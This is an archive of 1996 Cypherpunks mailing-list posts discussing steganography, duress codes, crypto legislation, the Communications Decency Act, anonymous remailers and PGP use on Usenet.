From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Mar 1996 13:05:47 +0800
To: cypherpunks@toad.com
Subject: Re: Is there any work on entropy-lowering schemes?
Message-ID: <199603040206.SAA07584@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 PM 3/1/96 -0500, Mutant Rob <wlkngowl@unix.asb.com> wrote:
>I'm wondering if anyone has done any work on schemes to lower the
>entropy of a given stream.  Why?  Save you've got message M encrypted
>with a good cipher, but you're worried that it can be detected because
>even with stego, the entropy is a lot higher than normal 'random' data
>flowing through a network.

Peter Wayner's work on Mimic Functions does just this sort of thing.
You can describe a grammar, feed it random bits, and generate output that
has the right statistics and can be reversed to get the original bits.
His paper was on cs.cornell.edu a few years ago; don't know where
to find it now.  AltaVista yields a reference to the paper in Cryptologia,
and the Cyphernomicon has the following:
              - "They encode a secret message inside a harmless looking
              ASCII text file.  This is one of the very few times
              the UNIX tools "lex" and "yacc" have been used in
              cryptography, as far as I know.   Peter Wayner, "Mimic
              Functions", CRYPTOLOGIA Volume 16, Number 3, pp. 193-214,
              July 1992.[Michael Johnson, sci.crypt, 1994-09-05]

(When I read the Cryptologia reference on my browser, I don't get the
ligature in the middle of "Huffman coding"; YMMV. :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sj@io.com (Steve Jackson)
Date: Mon, 4 Mar 1996 10:09:55 +0800
To: putsch@usa.pipeline.com
Subject: Re: Electronic Freedom press release
Message-ID: <v01530501ad5f8ef859b3@[205.198.209.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:50 PM 3/3/96, LibertyWMA@aol.com wrote:

(quoting George Phillies)
> When the Secret
>Service raided Steve Jackson Games to suppress publication of 'Hacker' I
>immediately wrote Congress to protest.

Serious distortion of the facts. "Hacker" was published as a reaction to
the raid; it was not the target of the raid. The book you are thinking
about is GURPS CYBERPUNK, which the Secret Service encouraged us to believe
was the object of the raid, but testimony at the trial indicated that that
was not the case. The SS was ignorantly indifferent to free speech and
publisher's rights, rather than taking direct aim at them. See
www.io.com/SS/ for more information.

Our case was a victory, but if it is cited in support of irrelevancies, it
has no more meaning than if it is forgotten completely.


Steve Jackson, sj@io.com - this will do till I fix my .sig file . . .






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 4 Mar 1996 13:35:28 +0800
To: cypherpunks@toad.com
Subject: Re: Netcom and Credit Cards
Message-ID: <199603031722.SAA21685@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



	"If someone's hacked our systems, we'd certainly like to know about
	it, although it's very doubtful; more likely, this just someone
	trying to make you nervous" - Netcom admin, 2600, Summer 1994

	"Recent reports indicate that Netcom's credit file, stored online
	and containing information on all their customers, has been
	compromised" - 2600 Magazine, Autumn 1994

Netcom claim Mitnick broke in during xmas 94, when the reality is that every
half decent hacker had already been there.  Netcom are an INTERNET PROVIDER!!!
You would expect them to know a thing or two about security.

But then again, even security samurais have problems setting up firewalls :-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Mar 1996 08:18:38 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Duress
In-Reply-To: <2.2.32.19960303090718.006a7d38@arn.net>
Message-ID: <Pine.SUN.3.91.960303182704.5238A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >As a side remark, every burglar alarm connected to a phone that I've ever seen
> >has this feature: a code that one can type under duress that will both turn
> >off the alarm and call for help. I wonder how many users will remember this
> >code when under duress.
> >
> 
> Many (if not most) alarm companies make the duress code the *reverse* of the normal code.

This might backfire in the case of self-destructing data.

If the attacker backs up the data, and enters the duress code, the real 
code is easy to guess the second time around.

> 
> Dave Merriman
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMTlEzsVrTvyYOzAZAQG9sAQAjfAQP6pEReh/vzx/dsJKU987FOMbqWgV
> Ik/NtzW7fRRzVYmruribT1ZtPQAcPTkdORZC22xHvk82E/m9Awv9q6Zhkbd29/TQ
> kcLQ42G3ddcUMA7EWtWtP231tofnyQtM5M7KRdIkKyT7oZdyXgjP42mysjGNDHAy
> wv2VcfiPwPQ=
> =fc6C
> -----END PGP SIGNATURE-----
> -------------------------------------------------------------
> "Giving money and power to government is like giving 
> whiskey and car keys to teenage boys."
>                     P. J. O'Rourke (b. 1947), U.S. journalist.
> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
> For privacy tools: http://www.geocities.com/capitolhill/1148
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Mon, 4 Mar 1996 08:19:19 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Export Legislation?
Message-ID: <199603032329.SAA22483@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I took a look at the text of the bill.  There was a line in it making
it a crime to use crypto in a way that obstructs a federal investigation.
While understandable, this is too vague... it could easily be interpreted
(IMO) as any strong crypto without escrow of some kind.

Anyone else feel this way about that line in the bill?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTorUyoZzwIn1bdtAQEWJgGA1KdA1HtbX9L0U22rBLKFouIQHQniAdA3
lvimml/i+Z/KmYSmHGqkGBwCb1hAfSxc
=E2ZA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 6 Mar 1996 13:11:29 +0800
To: Greg Rose <Greg_Rose@sydney.sterling.com>
Subject: Re: Duress
Message-ID: <199603040238.SAA09143@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 3/4/96 +1000, Greg Rose wrote:
>  At  2:49 PM 3/3/96 -0500, Dr. Dimitri Vulis wrote:
>  One of the private pilot magazines reported that a small plane operator
>  used the code (because his airplane was, in fact, being hijacked).  When he
>  landed the airplane, it was surrounded by LEA, and in the ensuing gun
>  battle, everyone on the airplane died.  The went on to say that the safety
>  of the passengers and airplane are the pilot's primary responsibility and
>  that pilots should consider this incident when deciding to use the code.
>
>Actually, that is an urban legend which grew out
>of a real incident. What actually happened was
>that they thought the private pilot couldn't
>really have been hijacked, so when he landed *he*
>was arrested for creating a public nuisance or
>something. It wasn't till later, when they found
>the shotgun-toting druggie, that they believed
>him...
>
>Greg Travis was the pilot's name, I imagine
>AltaVista might find his original posting.

My posting, not Dr. Dimitri Vulis'.  I certainly don't remember your
version as the one I personally read.  The magazine could have been wrong,
but I don't think my memory of the article is far enough off for them to be
the same incident  BTW - I think the magazine was "Flying".

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 6 Mar 1996 12:59:33 +0800
To: "'cpunks'" <cypherpunks@toad.com>
Subject: FW: Communications Decency Act (hee-hee)
Message-ID: <01BB0932.D4230420@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


	Had to share this funny bit with y'all......
	   ..
	Blanc

----------
From: 	William Pickard[SMTP:bpickard@pickard-murphy.com]
Sent: 	Sunday, March 03, 1996 6:07 PM
To: 	Mark Anderson
Subject: 	Communications Decency Act

Scott Adams, the author of Dilbert, contributes this to the debate:

Communications Decency Act
--------------------------

The government of the United States has passed a law which makes it a
crime to transmit indecent materials over the Internet.  As a citizen of
this great country I plan to fully comply with that law.

>From now on, whenever I get the urge to use an offensive word in e-mail I
will substitute the name of an offensive politician.  I urge you to do
the same.

The beauty of this approach is that they can't easily ban these new
naughty words without changing their own names.  I know I could get in
trouble for suggesting such a thing, but I don't give a flying Clinton
what they think.  And if they don't like it they can come over here and
kiss my Gingrich.

William Pickard                        bpickard@pickard-murphy.com
Pickard & Murphy, Inc.                    Telephone (206) 323-5979
3213 East Alder Street                          FAX (206) 860-4877
Seattle, Washington 98122-6314









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Mar 1996 09:27:25 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Duress
In-Reply-To: <199603032311.PAA16326@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960303191805.8425A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Bill Frantz wrote:

> At  2:49 PM 3/3/96 -0500, Dr. Dimitri Vulis wrote:
> 
> >As a side remark, every burglar alarm connected to a phone that I've ever seen
> >has this feature: a code that one can type under duress that will both turn
> >off the alarm and call for help. I wonder how many users will remember this
> >code when under duress.
> 
> The air-transport system has had a Hijack transponder code for years.  The
> pilot dials it into the air traffic system radar transponder when the plane
> is hijacked.

Of course, all smart air piracy buffs know the transponder code is 7600, 
and refuse to allow the pilots to use it.

> However there is a problem.
> 
> One of the private pilot magazines reported that a small plane operator
> used the code (because his airplane was, in fact, being hijacked).  When he
> landed the airplane, it was surrounded by LEA, and in the ensuing gun
> battle, everyone on the airplane died.  The went on to say that the safety
> of the passengers and airplane are the pilot's primary responsibility and
> that pilots should consider this incident when deciding to use the code.
> 
> Duress codes need to be designed to minimized the chance of such responses
> when they are used.
> 
> Regards - Bill
> 
> 
> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 5 Mar 1996 15:38:54 +0800
To: cypherpunks@toad.com
Subject: re: Validating credit cards
Message-ID: <960303192137.2020177f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually can think of several phleneomum that would satisfy but
first need to separate transactions into relating to electronic items
and relating to physical items.

In the case of physical items, pickup for shipping is probably done in 
batches (example: for FedEx the last pickup typically at 5 pm). It is not 
necessary to verify transactions instantaneously but rather when the order
is processed /shipped. This could be done in a batch mode syncronized with
order processing.

In the case of electronic media there are two choices: either immediate access
or delayed access. In the first case either access can be granted or immediate
verification can be done. In the case of immediate access, it should be
limited to items of restricted value. In delayed access the same batch
processing mode can be performed (during the 0-dark hours most likely).

This leaves only cases where immediate access must be granted and I suspect
that in most cases the vulnerability of 6-24 hours of access before 
verification will be small. Where the possible loss is low, we are back to
(a).

So in the small proportion of transactions where immediate verification and
transfer is necessary, I have no doubt that the existing infrastructure can 
handle it. At "slight additional charge" by the credit card company no doubt.

							Warmly,
								Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 4 Mar 1996 10:25:43 +0800
To: "Phillip M. Hallam-Baker" <hallam@w3.org>
Subject: Re: NYT login
In-Reply-To: <199603032135.QAA21850@bb.hks.net>
Message-ID: <Pine.SV4.3.91.960303192900.15834H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The tobacco companies need a forum. And they are used to spending big 
bucks on sponsoring things.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 4 Mar 1996 11:16:59 +0800
To: cypherpunks@toad.com
Subject: Third Generation Problems
Message-ID: <960303193329.2020177f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill rites:
>Duress codes need to be designed to minimized the chance of such responses
>when they are used.

Absolutely but is a third generation problem:

First generation:  being able to protect the information (encryption)
Second Generation: being able to respond to risks (duress) incurred by the
                   first generation solution (duress codes)
Third Generation:  being able to respond to risks incurred by using the second
                   generation response (using the duress codes).

Is nice to plan for each up front but often the succeding generation risks
only become apparent after living with the preceeding generation solution
for a while. This should not prevent anyone from implementing the first
because of what *might* happen in the second. "Doing nothing" is a sound
solution only for politicians. 

Besides the purpose of "duress codes" is not just to provide an avenue for
use in case of threat, it is also to deter the threat in the first place
by reducing the "win" probability for those who might issue the threat.

(previously mentioned a very real consideration for the fifth amendment. will
not repeat.)

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 5 Mar 1996 16:43:24 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: NYT login
In-Reply-To: <Pine.SV4.3.91.960303192900.15834H-100000@larry.infi.net>
Message-ID: <9603040042.AA20426@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


>The tobacco companies need a forum. And they are used to spending big 
>bucks on sponsoring things.

That misses the point. There is no shortage of potential sponsors.
What these people are asking me is "how much business will Web
advertising create for me".

The Tobacco companies are just as keen as others to know how much
value they get from Web advertising as other companies. 

No one sector of the ecconomy is going to be able to sustain the
whole range of Web content. The amounts involved will be of the order 
of billions. A few tens of millions from BAT etc will not go very
far. Pathfinder alone costs $4 million a year to run.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: not-for-mail@gate.overcom.com
Date: Mon, 4 Mar 1996 11:34:33 +0800
To: cypherpunks@toad.com
Subject: hjhf
Message-ID: <4hdeb3$1qu@gate.overcom.com>
MIME-Version: 1.0
Content-Type: text/plain


dhjdf
dfhj
dhj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Mar 1996 12:38:35 +0800
To: cypherpunks@toad.com
Subject: Re: FW: Communications Decency Act (hee-hee)
Message-ID: <ad5fa80801021004bde5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



WARNING: If you are under 18, do not read or download this message! Please
delete this message NOW and do not  either archive it or pass it on. You
have been warned, and I can take no further responsibility for your
actions. It has become necessary under the Communications Decency Act to
make this warning. Regrettably, my political views and financial condition
make me a potential target for prosecutors seeking to "set an example" as
well as to collect the $500,000 penalties for proving a violation of the
CDA. Hence my caution. Furthermore, quoted material may also contain
putatively indecent material, as the CDA makes much of ordinary speech a
felony if communicated by means of computer, so censorship of certain words
and ideas may be necessary.


At 2:54 AM 3/4/96, blanc wrote:

>Scott Adams, the author of Dilbert, contributes this to the debate:

>>From now on, whenever I get the urge to use an offensive word in e-mail I
>will substitute the name of an offensive politician.  I urge you to do
>the same.
>
>The beauty of this approach is that they can't easily ban these new
>naughty words without changing their own names.  I know I could get in
>trouble for suggesting such a thing, but I don't give a [exonized]
>what they think.  And if they don't like it they can come over here and
>[exonized].

This is of course an old idea. Regrettably, the CDA is not based on a
simple bright line test invovling the "Seven [exonized] Words,"
immortalized in the FCC--Carlin--Pacifica case. Rather, "indecent" is
broadly interpreted to mean essentially whatever a prosecutor can convince
a panel of bluenosed citizens is indecent.

In particular, the examples Blanc includes, which I have exonized to
protect myself from having to pay up to $500,000 in fines (and wouldn't you
guess that they'd love to make an example out of me...and collect from
me!), are still likely to be considered "indecent," as the allusions about
what Gingrich can do are still clear.

Welcome to the Fourth Reich.

--Alan Smithee, for obvious reasons

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Mar 1996 11:48:52 +0800
To: Bill Frantz <cypherpunks@toad.com
Subject: Re: Duress
In-Reply-To: <Pine.SUN.3.91.960303191805.8425A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.960303200707.8425D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Black Unicorn wrote:

> Of course, all smart air piracy buffs know the transponder code is 7600, 
> and refuse to allow the pilots to use it.

Typo on my part.  This should, of course, read 7500.

> ---
> My prefered and soon to be permanent e-mail address: unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Mon, 4 Mar 1996 11:09:56 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Anonymous Web Browsing
In-Reply-To: <199603030038.QAA06256@ix2.ix.netcom.com>
Message-ID: <Pine.A32.3.91.960303201632.106527F-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain



   I think the simplest solution is to not use Netscape for mail. Don't 
put your address in there in the first place.

On Sat, 2 Mar 1996, Bill Stewart wrote:

> >Note to Netscape people: Is it possible to have an option that will *always*
> >pop up a mail window and request confirmation before mail is sent out? Or
> >disable mailto altogether? It would be a lot easier than binary editing 
> >the executable to remove all the mailto strings...
> 
> At least in the Windows version, you can set the SMTP server you
> want to use for your outgoing mail.  So you could do a proxy email server
> that listens for SMTP and pops up confirmations for outgoing traffic.
> For the moment, you'd probably have to write your own, but the new
> Winsock Remailer probably has the code you need to do most of the work,
> and you'd only have to add some GUI buttons and whistles.
> 
> #--
> #				Thanks;  Bill
> # Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
> # http://www.idiom.com/~wcs     Pager +1-408-787-1281
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: electro <electro@newwave.net>
Date: Mon, 4 Mar 1996 14:42:48 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603040141.UAA01565@ns.newwave.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:16 PM 3/3/96 -0500, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Mark Allyn 206-860-9454 wrote:
>[..]
>> Take a piece of non conducting board, say about six by six
>> feet. Put electrodes on it; say a pair of electrodes every
>> quarter inch or so across and down.
>> 
>> Each pair of electrodes would be connected to logic so that
>> it generates a unique number. When the electrodes are shorted,
>> the number would be generated.
>
>Quite elaborate. And unless you live in a rainy part of the world, not 
>very useful.
>
>Better off using those contraptions where little steel balls fall around
>the electrodes.  There's some entropy there... but still, it's too 
>elaborate for RNG generation.
>- ---
Well how about putting a 'noise meter' in place of the 'rain sensor' and
then just hang it out the window or
any place that has some noise.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 4 Mar 1996 11:48:40 +0800
To: cypherpunks@toad.com
Subject: (Fwd) White House mail bomb protest?
Message-ID: <199603040145.UAA04626@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


In regards to the few messages about mailbombing the prez's box...

------- Forwarded Message Follows -------
 |From jms@tennis.opus1.com Sun Feb 11 06:57:22 1996
 |From: jms@tennis.opus1.com (Joel M Snyder, writing fool)
 |Subject: High mail volumes at whitehouse.gov
 |Newsgroups: comp.mail.misc,comp.security.misc,news.admin.net-abuse.misc
 |Date: 9 Feb 96 16:03:20 -0700
 |Organization: Opus One, Tucson, Arizona
 |Message-ID: <1996Feb9.160320.495@tennis.opus1.com>

 Folks:

 Good day.  By way of introduction, I'm the consultant who  did the
 "anti-mailstorm/anti-mailbomb" software that runs on the MX host for
 WHITEHOUSE.GOV.  Now that the Telecom. Act of 1996 has been signed,
 the volume of mail through WHITEHOUSE.GOV has gone up significantly.
 For example, there were about 85,000 lines in the mail log file yesterday.

 Most of that is just people who want to express their opinion.  However,
 several misguided individuals have decided that they want to throw a monkey
 wrench into the works by storming the President's email.

 I'm writing this to let any system administrators out there know that you
 may find mail from your site to WHITEHOUSE.GOV is not moving very quickly.
 This is normal; it's a sign that the automatic protections of that system
 have kicked in.

 Without going into details, if too many messages come from a single site,
 the mail handler will throttle back accepting messages.  Eventually,
 though, the mail will be accepted for delivery.  If you have legitimate
 mail, it will eventually get through (many messages from the same
 correspondent will be flushed without acknowledgement).  However,
 correspondents who were used to getting a reply within seconds telling them
 that their message was accepted may see a substantial delay.

 Finally, if any users on your site have any delusions about the effect of a
 mail bomb or storm of mail, let me help you dispel them: (1) no one
 important enough to make a difference will be affected or know or care; (2)
 if the messages are nasty or threatening enough, someone equally nasty may
 come and visit; (3) what you'll succeed most in doing is ruining the
 weekends and/or days of underpaid civil servants as well as wasting federal
 tax dollars.

 Please feel free to redistribute this or use parts of it in your motd.

 Joel Snyder
 (jms@opus1.com)

 PS: I don't read these newsgroups and am spending most of the weekend
 trying to make sure that the mail system doesn't melt down anyway, so if
 there is discussion on this, I won't see it.

 --------- end forwarded mesage -------------


Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 4 Mar 1996 12:00:59 +0800
To: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <2.2.32.19960303191053.00697678@mail.aracnet.com>
Message-ID: <kgT9JD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh <bruce@aracnet.com> writes:

> I'm surprised nobody has brought this up before....
>
>                      FIRST CALL FOR VOTES (of 2)
>             moderated group soc.culture.russian.moderated
>
> <snip>
>
> 6. Individuals in the database of known readers may post freely to
> the group, subject to the conditions in sections 1-4 above.  If need
> arises, the robomoderator may perform PGP verification of the
> identity of the known reader and, if the reader requests so,
> automatically reject all the submissions from the reader without
> a valid PGP signature.

Igor Chudov, who coded the robomoderator, reads Cypherpunks, and
is known to appreciate and use good suggestions.

One issue that hasn't been addressed by the s.c.r.m robomod is the
possibility of persistent nyms: that is, Alice D. Nonymous somehow makes
her public key known to the robomod; and later if someone submits an article
via some anon remailer claiming to be hers, it would be rejected if the
signature doesn't check. Of course, her true submissions would be accepted
from any remailer. How could such protocol be implemented?

(Of course, some people have what they believe to be valid reasons not
to use PGP.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Tue, 5 Mar 1996 07:54:08 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <199603040500.XAA06840@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960303211113.15462F-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996 ichudov@algebra.com wrote:

> Dr. Dimitri Vulis wrote:
...
> > Igor Chudov, who coded the robomoderator, reads Cypherpunks, and
> > is known to appreciate and use good suggestions.
> 
> Indeed. If you indicate your interest, I can post here a more or less
> full description of the robomoderator, how it implements secure
> exchange between itself and human moderators, verifies submissions,
> and signs approved articles for posting (it uses PMApp by Greg Rose).

It sounded cool (as heard on the moderator's list), but too complex for my
needs, and I think it required some stuff I don't have. Of course, for a
higher-traffic group, it's worth it. I don't see a way around the problem. 

... 
> > (Of course, some people have what they believe to be valid reasons not
> > to use PGP.)
> 
> Sorry if this question will provoke a mini flamewar, but what are
> such reasons?

1. If you're like me and you habitually read your mail online on a host on
the Internet, no matter how secure, then that's a security risk. Of course
one could, and many people do, create multiple PGP keys, one for casual
authentication and encryption online, and another held in check for stuff
that needs to be secure. I just don't bother with a "10% secure" key for 
cpunks and casual mail, though I do sign most of my Usenet posts.

2. If you send a PGP-signed message to a non-PGP-aware list, there will 
be questions, and sometimes ridicule. Sometimes this is an opportunity 
for education, sometimes it's just not worth the trouble.

3. Using PGP may attract the unwelcome attention of hostile local or
foreign governments, or possibly other armed thugs. 

4. "It's too hard."

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Mon, 4 Mar 1996 15:04:21 +0800
To: cypherpunks@toad.com
Subject: Looking for code to run an encrypted mailing list
Message-ID: <2.2.32.19960304053309.00bd5ec8@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to run an encrypted mailing list  - the model I'm linking of is this ..

Poster cryptes mail with pgp using list exploder key. List exploder decrypts
mail and recrypts with keys for all current list members and then sends the
mail.

[I don't want all the list members to need to know every other list members
public key]

Before I lanch into hacking majordomo - has anybody done this already or
somthing like it ?

John
--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Mar 1996 15:07:46 +0800
To: cypherpunks@toad.com
Subject: FUD about Remailers--the Strassman/Marlow "Revelations"
Message-ID: <ad5fbfab020210044ba1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I didn't imagine that people would take the off-the-wall assertions here
seriously, but "Anonymous" seems quite worried, so some comments can't
hurt.

At 4:40 AM 3/4/96, Anonymous wrote:

>
>>Both presenters explicitly acknowledged that a number of anonymous
>>remnailers in the US are run by government agencies scanning traffic.
>>Marlow said that the government runs at least a dozen remailers and that
>>the most popular remailers in France and Germany are run by the
>>respective government agencies in these countries. In addition they

Oh really? And just which remailers are in France and Germany? (Raph's list
doesn't show any ".de" or ".fr" sites, at least that I could see. It's
possible that a site or two exists in France or Germany, but I'm skeptical.
And certainly the "the most popular remailers in France and Germany" is an
odd comment.)

There are of course remailers in the Netherlands (Hacktic, for example),
and Julf's site in Finland. Perhaps Marlow mistook these countries for
France and Germany?

In any case, the claim that the few sites in Europe are "at least a dozen
remailers" and that they are run by the intelligence agencies of France and
Germany is specious.

I consider it unlikely that the remailer operators are working for the
spooks. (Something to consider in the future, and even to be thoughtful
about now. But unlikely at this time, with the current players, for various
reasons.)

Further, as with other recent comments we've seen, the authors seem to
misunderstand the nature of chained remailers.

These errors, plus the apparently slapdash way the article was
cut-and-pasted together (from the Web pages of others, usually without
acknowledgement), plus the scare tactic tone, makes me dismiss the entire
"paper."

>>mentioned that the NSA has successfully developed systems to break
>>encrypted messages below 1000 bit of key length and strongly suggested
>>to use at least 1024 bit keys. They said that they semselves use 1024
>>bit keys.

As others have also noted, just FUD to confuse and scare.

>     I don't know about everyone else, but I consider this, if true, to be a
>MAJOR worry.  It never ceases to amaze me how lightly the government takes
>lying to the people.  Unfortunately I don't have the contacts or resources
>to do any further investigation, I hope this thread is resolved one way or
>another soon.
>
>nobody@unimportant

"Investigation" can be done by doing what I just did: looking for these
supposed "dozens" of the "most popular" remailer sites, looking for them in
France or Germany, and not finding them. (Maybe they're secret, known only
to CIA, SDECE, and BND operatives? The operative word being "paranoid.")

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li> (by way of frantz@netcom.com (BillFrantz))
Date: Mon, 4 Mar 1996 15:29:50 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
Message-ID: <199603040535.VAA25193@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Bill Frantz wrote:

> >Of course, all smart air piracy buffs know the transponder code is 7600, 
> >and refuse to allow the pilots to use it.
> 
> It changes from time to time.  Of course subscribing to an IFR chart
> service will keep you up-to-date with the changes.

You should forward this to the list.

> 
> Regards - Bill
> 
> 
> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
